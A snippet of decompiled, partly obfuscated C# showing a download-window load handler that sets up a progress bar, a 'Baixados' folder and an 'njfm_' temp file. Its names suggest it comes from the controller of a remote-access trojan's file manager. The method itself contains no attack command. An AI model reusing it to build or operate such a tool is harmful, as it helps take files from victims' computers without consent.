Esempio n. 1
0
        // Token: 0x060000ED RID: 237 RVA: 0x001E0EA0 File Offset: 0x001DF2A0
        private void DW_Load(object sender, EventArgs e)
        {
            this.Text = Conversions.ToString(RuntimeHelpers.GetObjectValue(Operators.ConcatenateObject(RuntimeHelpers.GetObjectValue(Operators.ConcatenateObject(RuntimeHelpers.GetObjectValue(Class7.smethod_1(this.osk.L)), " - ")), Class6.smethod_16(this.FN))));
            this.ProgressBar1.Maximum = this.SZ;
            this.folder = this.osk.Folder + "Baixados\\";
            bool flag = !Directory.Exists(this.folder);

            if (flag)
            {
                Directory.CreateDirectory(this.folder);
            }
            this.folder += new FileInfo(Class6.smethod_16(this.FN)).Name;
            this.Lv1.Items[0].SubItems[0].Text = new FileInfo(Class6.smethod_16(this.FN)).Name;
            this.Lv1.Items[1].SubItems[0].Text = Class6.smethod_17((long)this.SZ);
            do
            {
                this.tmp = Interaction.Environ("Temporarios") + "\\njfm_" + Class6.smethod_6(10);
            }while (File.Exists(this.tmp));
            this.FS = new FileStream(this.tmp, FileMode.Append);
            this.Lv1.Items[2].SubItems[0].Text = Class6.smethod_17((long)(this.ProgressBar1.Value - this.os));
            this.os = this.ProgressBar1.Value;
            this.Lv1.Items[3].SubItems[0].Text = Class6.smethod_17((long)this.ProgressBar1.Value);
            this.Lv1.method_3();
            this.Timer1.Enabled = true;
        }